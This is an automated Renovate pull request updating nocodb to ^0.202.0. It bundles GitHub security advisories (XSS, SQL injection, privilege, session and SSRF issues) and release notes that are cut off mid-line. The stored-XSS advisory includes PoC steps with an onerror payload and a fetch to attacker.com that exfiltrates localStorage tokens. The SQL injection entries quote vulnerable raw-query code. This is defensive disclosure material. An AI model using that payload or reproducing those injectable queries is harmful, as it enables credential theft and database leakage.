Update dependency nocodb to ^0.202.0 [SECURITY]

[renovate]

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package	Change	Age	Confidence
nocodb	^0.83.0 → ^0.202.0

---

Cross-site Scripting in NocoDB

CVE-2022-2079 / GHSA-hv6q-5g4f-8897

More information

Details

Cross-site Scripting (XSS) - Stored in GitHub repository nocodb/nocodb prior to 0.91.9.

Severity

• CVSS Score: 5.4 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

References

• https://nvd.nist.gov/vuln/detail/CVE-2022-2079
• https://github.com/nocodb/nocodb/commit/362f8f0869989bc13bdcd66c6fc9c86ac79b9992
• https://huntr.dev/bounties/2615adf2-ff40-4623-97fb-2e4a3800202a
• https://github.com/nocodb/nocodb/issues/2262
• https://github.com/nocodb/nocodb/pull/2343
• https://github.com/nocodb/nocodb/releases
• https://github.com/advisories/GHSA-hv6q-5g4f-8897

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Improper Privilege Management in NocoDB

CVE-2022-2063 / GHSA-fq4h-m3c8-8m2v

More information

Details

Improper Privilege Management in GitHub repository nocodb/nocodb prior to 0.91.8.

Severity

• CVSS Score: 8.8 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

References

• https://nvd.nist.gov/vuln/detail/CVE-2022-2063
• https://github.com/nocodb/nocodb/commit/269a19c2ad89a0e8a7596498e3806ff2ec1040c2
• https://huntr.dev/bounties/156f405b-21d6-4384-9bff-17ebfe484e20
• https://github.com/nocodb/nocodb/pull/2262
• https://github.com/nocodb/nocodb/pull/2337
• https://github.com/advisories/GHSA-fq4h-m3c8-8m2v

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Insufficient Session Expiration in NocoDB

CVE-2022-2064 / GHSA-6293-2vg2-pmp5

More information

Details

Insufficient Session Expiration in GitHub repository nocodb/nocodb prior to 0.91.9.

Severity

• CVSS Score: 8.8 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

References

• https://nvd.nist.gov/vuln/detail/CVE-2022-2064
• https://github.com/nocodb/nocodb/commit/c9b5111b25aea2781e19395a8e9107ddbd235a2b
• https://huntr.dev/bounties/39523d51-fc5c-48b8-a082-171da79761bb
• https://github.com/nocodb/nocodb/pull/2262
• https://github.com/nocodb/nocodb/pull/2338
• https://github.com/nocodb/nocodb/releases/tag/0.91.9
• https://github.com/advisories/GHSA-6293-2vg2-pmp5

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

NocoDB vulnerable to Denial of Service

CVE-2022-3423 / GHSA-grv6-m753-3w2g

More information

Details

NocoDB prior to 0.92.0 allows actors to insert large characters into the input field New Project on the create field, which can cause a Denial of Service (DoS) via a crafted HTTP request. Version 0.92.0 fixes this issue.

Severity

• CVSS Score: 6.5 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

References

• https://nvd.nist.gov/vuln/detail/CVE-2022-3423
• https://github.com/nocodb/nocodb/commit/000ecd886738b965b5997cd905825e3244f48b95
• https://huntr.dev/bounties/94639d8e-8301-4432-ab80-e76e1346e631
• https://github.com/advisories/GHSA-grv6-m753-3w2g

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

NocoDB information disclosure vulnerability

CVE-2022-2062 / GHSA-mx8q-jqwm-85mv

More information

Details

In NocoDB prior to 0.91.7, the SMTP plugin doesn't have verification or validation. This allows attackers to make requests to internal servers and read the contents.

Severity

• CVSS Score: 7.5 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

References

• https://nvd.nist.gov/vuln/detail/CVE-2022-2062
• https://github.com/nocodb/nocodb/commit/a18f5dd53811b9ec1c1bb2fdbfb328c0c87d7fb4
• https://huntr.dev/bounties/35593b4c-f127-4699-8ad3-f0b2203a8ef6
• https://github.com/advisories/GHSA-mx8q-jqwm-85mv

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Improper Input Validation in nocodb

CVE-2023-5104 / GHSA-xrpm-hccg-28x7

More information

Details

Improper Input Validation in GitHub repository nocodb/nocodb prior to 0.96.0.

Severity

• CVSS Score: 6.5 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

References

• https://nvd.nist.gov/vuln/detail/CVE-2023-5104
• https://github.com/nocodb/nocodb/commit/db0385cb8aab2a34e233454607f59152ac62b3e2
• https://huntr.dev/bounties/1b5c6d9f-941e-4dd7-a964-42b53d6826b0
• https://github.com/advisories/GHSA-xrpm-hccg-28x7

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

nocodb SQL Injection vulnerability

CVE-2023-43794 / GHSA-3m5q-q39v-xf8f

More information

Details

Summary

Nocodb contains SQL injection vulnerability, that allows an authenticated attacker with creator access to query the underlying database.

Product

nocodb/nocodb

Tested Version

0.109.2

Details

SQL injection in SqliteClient.ts (GHSL-2023-141)

By supplying a specially crafted payload to the given below parameter and endpoint, an attacker can inject arbitrary SQL queries to be executed. Since this is a blind SQL injections, an attacker may need to use time-based payloads which would include a function to delay execution for a given number of seconds. The response time indicates, whether the result of the query execution was true or false. Depending on the result, the HTTP response will be returned after a given number of seconds, indicating TRUE, or immediately, indicating FALSE. In that way, an attacker can reveal the data present in the database.

The triggerList method creates a SQL query using the user-controlled table_name parameter value from the tableCreate endpoint.

async triggerList(args: any = {}) {
  const _func = this.triggerList.name;
  const result = new Result();
  log.api(`${_func}:args:`, args);

  try {
    args.databaseName = this.connectionConfig.connection.database;

    const response = await this.sqlClient.raw(
      `select *, name as trigger_name from sqlite_master where type = 'trigger' and tbl_name='${args.tn}';`,
    );
[...]

Impact

This issue may lead to Information Disclosure.

Credit

This issue was discovered and reported by GHSL team member @​sylwia-budzynska (Sylwia Budzynska).

Disclosure Policy

This report is subject to our coordinated disclosure policy.

Severity

• CVSS Score: 6.5 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

References

• https://github.com/nocodb/nocodb/security/advisories/GHSA-3m5q-q39v-xf8f
• https://github.com/nocodb/nocodb/blob/3ec82824eeb2295f6b67fd67e7d6049784b41221/packages/nocodb/src/controllers/tables.controller.ts#L63
• https://github.com/nocodb/nocodb/blob/3ec82824eeb2295f6b67fd67e7d6049784b41221/packages/nocodb/src/db/sql-client/lib/sqlite/SqliteClient.ts#L628-L654
• https://github.com/nocodb/nocodb/blob/3ec82824eeb2295f6b67fd67e7d6049784b41221/packages/nocodb/src/db/sql-client/lib/sqlite/SqliteClient.ts#L637
• https://nvd.nist.gov/vuln/detail/CVE-2023-43794
• https://github.com/advisories/GHSA-3m5q-q39v-xf8f

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

NocoDB SQL Injection vulnerability

CVE-2023-50718 / GHSA-8fxg-mr34-jqr8

More information

Details

Summary

---

An authenticated attacker with create access could conduct a SQL Injection attack on MySQL DB using unescaped table_name.

Details

---

SQL Injection vulnerability occurs in VitessClient.ts.

async columnList(args: any = {}) {
    const func = this.columnList.name;
    const result = new Result();
    log.api(`${func}:args:`, args);

    try {
      args.databaseName = this.connectionConfig.connection.database;

      const response = await this.sqlClient.raw(
        `select *, table_name as tn from information_schema.columns where table_name = '${args.tn}' ORDER by ordinal_position`,
      );

The variable ${args.tn} refers to the table name entered by the user.
A malicious attacker can escape the existing query by including a special character (') in the table name and insert and execute a new arbitrary SQL query.

Impact

---

This vulnerability may result in leakage of sensitive data in the database.

Severity

• CVSS Score: 6.5 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

References

• https://github.com/nocodb/nocodb/security/advisories/GHSA-8fxg-mr34-jqr8
• https://nvd.nist.gov/vuln/detail/CVE-2023-50718
• https://github.com/advisories/GHSA-8fxg-mr34-jqr8

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

NocoDB Vulnerable to Stored Cross-Site Scripting in Formula.vue

CVE-2023-49781 / GHSA-h6r4-xvw6-jc5h

More information

Details

Summary

A stored cross-site scripting vulnerability exists within the Formula virtual cell comments functionality.

Details

The nc-gui/components/virtual-cell/Formula.vue displays a v-html tag with the value of "urls" whose contents are processed by the function replaceUrlsWithLink(). This function recognizes the pattern URI::(XXX) and creates a hyperlink tag with href=XXX. However, it leaves all the other contents outside of the pattern URI::(XXX) unchanged, which makes the evil users can create a malicious table with a formula field whose payload is <img src=1 onerror="malicious javascripts"URI::(XXX). The evil users then can share this table with others by enabling public viewing and the victims who open the shared link can be attacked.

PoC

Step 1: Attacker login the nocodb and creates a table with two fields, "T" and "F". The type of field "T" is "SingleLineText", and the type of the "F" is "Fomula" with the formula content {T}
Step 2: The attacker sets the contents of T using <img src=1 onerror=alert(localStorage.getItem('nocodb-gui-v2'))URI::(XXX)
Step 3: The attacker clicks the "Share" button and enables public viewing, then copies the shared link and sends it to the victims
Step 4: Any victims who open the shared link in their browsers will see the alert with their confidential tokens stored in localStorage

The attackers can use the fetch(http://attacker.com/?localStorage.getItem('nocodb-gui-v2')) to replace the alert and then steal the victims' credentials in their attacker.com website.

Impact

Stealing the credentials of NocoDB user that clicks the malicious link.

Severity

• CVSS Score: 7.3 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

References

• https://github.com/nocodb/nocodb/security/advisories/GHSA-h6r4-xvw6-jc5h
• https://github.com/nocodb/nocodb/commit/7f58ce3726dfec71537d8b80474a0f95a48a1574
• https://nvd.nist.gov/vuln/detail/CVE-2023-49781
• https://github.com/advisories/GHSA-h6r4-xvw6-jc5h

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

nocodb/nocodb (nocodb)

v0.202.10: : Bug Fix Release

Compare Source

🚀 NocoDB : Bug Fix Release

What's Changed

• chore(renovate): Update dependency @​nuxt/image-edge to v1.1.0-28355789.b3279fe by @​renovate in #​7127
• docs: formula expansion as md sections by @​dstala in #​7116
• fix : added tooltip for column fields by @​musharaf-nocodb in #​7114
• fix: various leftover stuff by @​mertmit in #​7140
• fix: deprecate title length validator and use title on import editor by @​mertmit in #​7092
• fix: group by has many bt part by @​mertmit in #​7146
• fix: Added new join cloud btn by @​dstala in #​7072
• feat: display as progress by @​mertmit in #​7138
• fix: Extract api token roles by @​pranavxc in #​7169
• fix: filter mimetypes to preview in browser by @​mertmit in #​7162
• fix: use getSchema instead of validate for ajv by @​mertmit in #​7160
• fix: leftover issue with alternative clients by @​mertmit in #​7164
• fix: Missing values in LTAR columns by @​pranavxc in #​7161
• fix(nc-gui): non-image attachments in shared form by @​wingkwong in #​7177
• fix: while validating options check for option with wrapped in single quotes by @​pranavxc in #​7170
• fix : fixed column syncing in useViewColumnsOrThrow hook by @​musharaf-nocodb in #​7168
• fix : added showOnTruncateOnly prop in tooltip component by @​musharaf-nocodb in #​7163
• Fix: Misc minor design changes by @​rameshmane7218 in #​7148
• Nc fix/rich text followup by @​dstala in #​7175
• fix: Nested data apis(v2) permission issue by @​pranavxc in #​7179
• feat: support yyyy-mm in Datepicker by @​wingkwong in #​6870
• enhancement: rollup by @​wingkwong in #​6853
• fix: exact date filter not working on datetime by @​DarkPhoenix2704 in #​7189
• fix: Load userList only if allowed by @​pranavxc in #​7194
• fix: Ignore throwing error in upgrader if error is index already exist by @​pranavxc in #​7195
• fix: Escape single quote properly and when updating single select default value by @​pranavxc in #​7197
• feat: paste option in cell right click context menu by @​rameshmane7218 in #​7207
• fix: UI/UX fixes #​7156 by @​rameshmane7218 in #​7173
• fix(nc-gui): add missing kanban clbk in expanded form by @​wingkwong in #​7200
• fix: rename ncProjectId to ncBaseId by @​mertmit in #​7213
• fix: Avoid setting default value(LTAR/Links) when adding new row in grouped by table by @​pranavxc in #​7208
• Fix/dropdown UI by @​musharaf-nocodb in #​7181

🐛 Closed Issues

• [closed] 🐛 Bug: Upgrade to 0.202.9 causes NocoDB to crash when visualizing a Grid View with Group By #​7205
• [🏗️ Status: In Resolution] 🐛 Bug: Grid View - When adding a new Record with a Group By on the view, the field corresponding to the Group By remains empty #​7204
• [🐛 Type: Bug] 🐛 Bug: [UX] Kanban View - When adding a record in a stack, the new record goes to (and stays in) the "Uncategorized" stack instead of its correct stack #​7198
• [Status: Reproducible] 🐛 Bug: API v2 returning 403 in "GET link records list" and "POST link records" methods #​7174
• [closed] 🐛 Bug: [MySQL] unable to use set select field with single quotes as default value #​7171
• [closed] 🐛 Bug: M2M tables without content after update #​7158
• [closed] 🔦 Feature: Switching among RTL form fields using tab button #​7157
• [closed] 🐛 Bug: UI/UX fixes #​7156
• [🐛 Type: Bug] 🐛 Bug: failed to open / download non-image attachments in shared form #​7155
• [🔎 Status: More Info Needed] 🐛 Bug: Invalid path concatenated while installing nocodb-sdk #​7151
• [closed] 🐛 Bug: invalid option error when inserting to single select column #​7149
• [closed] 🔦 Feature: When "grouping by", allow to select the number of elements to display #​7147
• [closed] 🐛 Bug: Group-by for belongs-to field throws error #​7144
• [closed] 🐛 Bug: API giving 403 after latest update #​7141
• [closed] 🐛 Bug: Rename View In Dropdown menu #​7136
• [👩‍🔬 Status: In-Analysis] 🐛 Bug: All the links have disappeared #​7125
• [closed] 🐛 Bug: Not able to change body in webhook of nocodb cloud #​7118
• [Status: Reproducible] 🐛 Bug: Fields are no longer displayed in full. #​7108
• [🏗️ Status: In Resolution] 🐛 Bug: Unauthorized access when using API token in n8n node #​7084
• [closed] 🐛 Bug: Rich text follow-ups #​7074
• [🟣 Priority: Low] 🐛 Bug: page reloads without any reason sometimes #​7033
• [closed] 🔦 Feature: display as progress bar for percent #​6973
• [closed] 🐛 Bug: NocoDB Cloud Available #​6970
• [closed] enhancement: rollup #​6852
• [closed] 🐛 Bug: Deployment Failure when migrating from 0.111.1 to 0.202.5 (Railway) - "Migration from 0108002 to 0111002 failed", Relation aready exists #​6826
• [closed] 🔦 Feature: Support use of Rollup's with in formula #​6807
• [closed] 🐛 Bug: Use Rollup sum for duration field，the data display should also be duration, but it shows the number of seconds. #​6778
• [closed] 🔦 Feature: columnType Date Format : add YYYY-MM #​5199

New Contributors

• @​musharaf-nocodb made their first contribution in #​7114
• @​rameshmane7218 made their first contribution in #​7148

Full Changelog: nocodb/nocodb@0.202.9...0.202.10

v0.202.9: : Bug Fix Release

Compare Source

🚀 NocoDB : Bug Fix Release

🐛 Closed Issues

• [Status: Reproducible] 🐛 Bug: Creating Link Between Records Via V2 API Throws Error #​7119
• [Status: Reproducible] 🐛 Bug: Links and Link to another record API strange behavior #​7109
• [closed] 🐛 Bug: Use ncRecordId with API #​7086
• [🏗️ Status: In Resolution] 🐛 Bug: Unauthorized access when using API token in n8n node #​7084
• [closed] 🐛 Bug: for viewer & commenter role, do not ask for save changes on closing expanded record #​7066
• [closed] 🐛 Bug: Additional download menu displayed in toolbar for viewer & commenter role #​7065
• [Status: Reproducible] 🐛 Bug: Hit delete key on formula focused textfield will remove the whole new field #​7050
• [closed] 🐛 Bug: icons mapped at Lookup > Child field needs fix #​6989
• [Status: Reproducible] 🐛 Bug: Lookup for barcode, qrcode displays only one image even if multiple links exist #​6988
• [Status: Reproducible] 🐛 Bug: Error when creating lookup column #​6975
• [closed] 🐛 Bug: grid skeleton loader UX & performance enhancements #​6961
• [closed] 🐛 Bug: Locked view #​6934
• [closed] 🐛 Bug: Expanded record, refresh formula field when associated field is updated & saved #​6931
• [closed] 🐛 Bug: Webhook payload not escaped/formatted correctly #​6822
• [🐬 DB : MySQL] 🐛 Bug: Add/Edit modal with MySQL #​6747
• [🔎 Status: More Info Needed] 🐛 Bug: Not getting correct response in webhook payload. #​6746
• [🟣 Priority: Low] 🐛 Bug: Auto increment field ID not ignored if sent in API payload #​5871
• [closed] 🐛 Bug: Populating select values via the API doesn't fully work #​5492
• [🐛 Type: Bug][🏗️ Status: In Resolution] 🐛 Bug: Sort by Lookup column does not work #​2573
• [🔦 Type: Feature][🍰 Scope : Column] Feature: Rich editor for multiline text #​298

What's Changed

• Release 0.202.8 by @​github-actions in #​7036
• chore(renovate): Update patch (patch) by @​renovate in #​7034
• New Crowdin updates by @​o1lab in #​7040
• chore(renovate): Update patch (patch) by @​renovate in #​7041
• fix: Fixed issue with Cell icon not taking column prop with column in… by @​dstala in #​7048
• chore(renovate): Update dependency mysql2 to ^3.6.4 by @​renovate in #​7047
• chore(renovate): Update patch (patch) by @​renovate in #​7052
• fix: Auto increment field ID not ignored if sent in API payload by @​aashishagrawall in #​6878
• feat: Missing formula functions support by @​pranavxc in #​7019
• fix: Fixed issue with formula not getting updated in expanded form on… by @​dstala in #​7055
• fix: use json as default content type for webhooks by @​mertmit in #​7056
• fix: delete for formula in fields menu by @​dstala in #​7062
• New Crowdin updates by @​o1lab in #​7059
• chore: bump axios version by @​mertmit in #​6949
• Nc fix/skelton fix by @​dstala in #​7063
• Locked mode by @​mustafapc19 in #​7067
• chore(renovate): Update patch (patch) by @​renovate in #​7057
• fix: augment #app rather than #app/nuxt by @​danielroe in #​7064
• fix: Update acl.ts to allow editor to import excel files by @​cedstrom in #​7043
• Miscellaneous bug fixes/enhancements by @​pranavxc in #​7054
• New Crowdin updates by @​o1lab in #​7069
• Rich text long text by @​mustafapc19 in #​7046
• feat: id instead title in queries by @​mertmit in #​7060
• fix: various at-import issues by @​mertmit in #​7076
• New Crowdin updates by @​o1lab in #​7081
• chore(renovate): Update patch (patch) by @​renovate in #​7082
• Subtle update to spanish.md by @​Scalcaneo in #​7088
• Nc fix/misc 3 by @​dstala in #​7089
• Remove signup link from signup page if invite only signup enabled by @​pranavxc in #​7044
• fix: Validate select options before insert by @​pranavxc in #​7070
• fix: use getWithRoles for auth token strategy by @​mertmit in #​7083
• chore(renovate): Update dependency @​vue/compiler-sfc to ^3.3.9 by @​renovate in #​7093
• fix: use title instead of id while substituting by @​mertmit in #​7094
• chore(renovate): Update patch (patch) by @​renovate in #​7097
• chore(renovate): Update patch (patch) by @​renovate in #​7098
• New Crowdin updates by @​o1lab in #​7101
• New Crowdin updates by @​o1lab in #​7104
• chore(renovate): Update patch (patch) by @​renovate in #​7102
• Fixed skelton loading issue by @​mustafapc19 in #​7105
• fix: Render label span only if default slot is defined by @​pranavxc in #​7106
• chore(renovate): Update patch (patch) by @​renovate in #​7110
• New Crowdin updates by @​o1lab in #​7107
• fix: Fields query param - virtual column by @​pranavxc in #​7111
• fix: Extract row id value using title by @​pranavxc in #​7120
• 0.202.9 Pre-release by @​github-actions in #​7121

New Contributors

• @​aashishagrawall made their first contribution in #​6878
• @​cedstrom made their first contribution in #​7043
• @​Scalcaneo made their first contribution in #​7088

Full Changelog: nocodb/nocodb@0.202.8...0.202.9

v0.202.8: : Bug Fix Release

Compare Source

🚀 NocoDB : Bug Fix Release

🐛 Closed Issues

• [closed] 🐛 Bug: error when filtering by lookup field that is Link in the parent table. #​7027
• [closed] 🐛 Bug: API V2 Update API /rowid is missing #​7021
• [🐛 Type: Bug] 🐛 Bug: Api linked fields duplicated #​7020
• [🐛 Type: Bug] 🐛 Bug: Import excel throw 42701 Error #​6998
• [closed] 🐛 Bug: Uniform error in API v2 #​6986
• [Status: Reproducible] 🐛 Bug: import file content title not support unicode eg.(emoji🔥, Chinese) #​6959
• [closed] Runtime directive used on component with non-element root node. The directives will not function as intended. #​6952
• [closed] 🐛 Bug: multi fields editor, field type icons displayed are incorrect #​6946
• [closed] 🐛 Bug: Migration directory is corrupt #​6936
• [closed] Connect New Data Source #​6913
• [closed] 🐛 Bug: view context menu to include download CSV & upload CSV options #​6857
• [closed] 🐛 Bug: API LINK RECORDS ENDPOINT NOT WORKING. #​6823
• [closed] 🐛 Bug: Default View not showing if you moved it to other row in past version #​6798
• [closed] 🔦 Feature: Allow grouping by more column types #​6247
• [🔎 Status: More Info Needed] 🐛 Bug: Failure to duplicate project/table #​5788

What's Changed

• Release 0.202.7 by @​github-actions in #​7008
• Fix GitHub casing in Translation page by @​varghesejose2020 in #​7009
• chore(deps-dev): bump sharp from 0.32.5 to 0.32.6 by @​dependabot in #​7011
• chore(renovate): Security update Update dependency passport to ^0.6.0 [SECURITY] by @​renovate in #​6995
• Korean enum Language correction by @​bsy0317 in #​7014
• fix: New data api(v2) insert method bug by @​pranavxc in #​7015
• fix(s3): use stream to upload via url by @​mertmit in #​7018
• chore(deps): bump sharp and @​docusaurus/plugin-ideal-image in /packages/noco-docs by @​dependabot in #​7010
• Fix GitHub Casing issue in 060.builds-and-releases.md by @​varghesejose2020 in #​7024
• refactor: Uniform error message by @​pranavxc in #​7025
• chore(renovate): Update patch (patch) by @​renovate in #​6996
• chore(renovate): Update patch (patch) by @​renovate in #​7028
• fix: vue warnings by @​wingkwong in #​6954
• chore: logic for replacing version by @​mertmit in #​6759
• fix: import sanitization by @​wingkwong in #​7022
• chore(renovate): Update patch (patch) by @​renovate in #​7031
• New Crowdin updates by @​o1lab in #​7032
• fix: on clicking table node navigate to default view by @​pranavxc in #​7023
• fix: Avoid treating value as column_name in sql join by @​pranavxc in #​7017
• fix: ignore duplicate item in LTAR by @​pranavxc in #​7030
• 0.202.8 Pre-release by @​github-actions in #​7035

New Contributors

• @​varghesejose2020 made their first contribution in #​7009
• @​bsy0317 made their first contribution in #​7014

Full Changelog: nocodb/nocodb@0.202.7...0.202.8

v0.202.7: : Hotfix Release

Compare Source

🚀 NocoDB : Hotfix Release

What's Changed

• fix: select options delete and reorder by @​mertmit in #​7005

Full Changelog: nocodb/nocodb@0.202.6...0.202.7

v0.202.6: : Bug Fix Release

Compare Source

🚀 NocoDB : Bug Fix Release

🐛 Closed Issues

• [closed] Action Required: Fix Renovate Configuration #​6993
• [closed] How do I tell what version of nocodb I'm running? #​6985
• [closed] 🐛 Bug: select options remove issue #​6971
• [closed] ERD #​6968
• [closed] Storage location of database files #​6966
• [Status: Reproducible] 🐛 Bug: error with default value configuration in date field (PG) #​6964
• [closed] 🐛 Bug: Regression on json column type, cannot use json array, invalid input syntax #​6963
• [closed] 🐛 Bug: issue with leading or trailing space in select options #​6960
• [closed] 🐛 Bug: Show v2 API in Swagger #​6958
• [closed] 🔦 Feature: pagination size for group by #​6944
• [closed] 🐛 Bug: Invalid filter in list API #​6943
• [closed] 🐛 Bug: No EOF in long text and impossible to see in a lookup #​6929
• [closed] 🐛 Bug: UI Misc #​6927
• [closed] 🐛 Bug: Duplicate base doesn't copy table/view icons #​6926
• [closed] 🔦 Feature: When creating a new record from the link adding menu, link it automatically #​6925
• [closed] 🐛 Bug: Not possible now to get Attachments URL through Webhook #​6924
• [closed] 🐛 Bug: CSV import, truncate table/field name if it exceeds limit #​6916
• [closed] 🐛 Bug: Google auth token parse failure #​6915
• [closed] 🐛 Bug: Update Nocodb latest #​6911
• [🔎 Status: More Info Needed] 🔦 Feature: Do have the function of printing design？ #​6906
• [closed] permissions Precise to Fields #​6893
• [closed] 🔦 Feature: Turn all values in a column into a linked field. #​6892
• [closed] 🐛 Bug: 8080 Port occupied node:events:515 throw er; // Unhandled 'error' event #​6891
• [closed] Change the default language to Chinese #​6885
• [closed] 🐛 Bug: Nest can't resolve dependencies of the EventSubscribersLoader #​6884
• [closed] 🔦 Feature: Base Reordering #​6882
• [closed] 🔦 Feature: Still not possible to rollup a formula field #​6881
• [closed] 🐛 Bug: Duplicate database error #​6874
• [closed] 🔦 Feature: Support details in README #​6868
• [closed] 🐛 Bug: .HEIC files are not supported #​6866
• [closed] 🐛 Bug: Delete Data Source => Remove Data Source #​6862
• [closed] How to make the modified UI interface take effect on port 8080？？？ #​6859
• [closed] 🔦 Feature: Do not automatically reveal newly created fields in all of the previously existing views #​6858
• [closed] 🐛 Bug: display column ID in multi-fields editor #​6850
• [Status: Reproducible] 🐛 Bug: Linked records modal from form view is stuck with skeleton loader #​6844
• [closed] 🐛 Bug: Invalid redirection URL #​6843
• [🐛 Type: Bug][🏗️ Status: In Resolution] 🐛 Bug: Cannot change the Account Name #​6841
• [closed] 🐛 Bug: NotFoundException: Cannot GET /plugins/ovhCloud.png #​6840
• [🏗️ Status: In Resolution] 🐛 Bug: AUTH TOKEN FOR CLOUD VERSION DOES NOT WORK WITH N8N #​6837
• [closed] 🐛 Bug: default value for GeoData field type #​6832
• [closed] 🐛 Bug: Expanded record read only fields #​6830
• [closed] 🐛 Bug: keyboard shortcut- map backspace to clear cell #​6821
• [closed] 🔦 Feature: Checkbox based Kanban Board #​6818
• [closed] 🔦 Feature: Table Level Access #​6813
• [closed] 🔦 Feature: Web clipper extension #​6806
• [closed] 🔦 Feature: The Buttons in the Header Section Lacks Transition #​6804
• [Status: Reproducible] 🔦 Feature: Expanded Row Autosave and Searchtool #​6799
• [closed] 🐛 Bug: In grid view, behaviour on click & right click field header #​6793
• [closed] 🔦 Feature: Make the view creation MORE visible. #​6792
• [closed] 🔦 Feature: Drag and drop reorder of column #​6791
• [🐛 Type: Bug] 🐛 Bug: Additional property DB_QUERY_LIMIT_MAX is not allowed #​6790
• [closed] 🐛 Bug: Team & Settings not accessible for Org Creator #​6784
• [closed] 🐛 Bug: exclude junction table relation from swagger #​6783
• [closed] 🐛 Bug: fields dropdown UI #​6781
• [closed] 🔦 Feature: support for duplicate column with data #​6779
• [closed] 🐛 Bug: consistency with Inflection & capitalise of different names used with in nocodb #​6768
• [🐛 Type: Bug][Status: Reproducible] 🐛 Bug: Attachment-type data's title string doesn't match non-Ascii char #​6760
• [🏗️ Status: In Resolution] 🐛 Bug: Webhook link can't be private IP address of LAN #​6757
• [🏗️ Status: In Resolution] 🐛 Bug: Filters not updating after upgrade #​6752
• [👩‍🔬 Status: In-Analysis] 🐛 Bug: Image permalinks broke after update - how to get new ones? #​6745
• [🔎 Status: More Info Needed] 🐛 Bug: Cloud : import in csv file #​6703
• [Status: Reproducible] 🐛 Bug: custom singular / plural label for links field was reset after docker restart #​6702
• [Status: Reproducible] 🐛 Bug: The page is displayed as the key of the i18n json file [#​6700](https://redirect.github.com/nocodb/noco

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.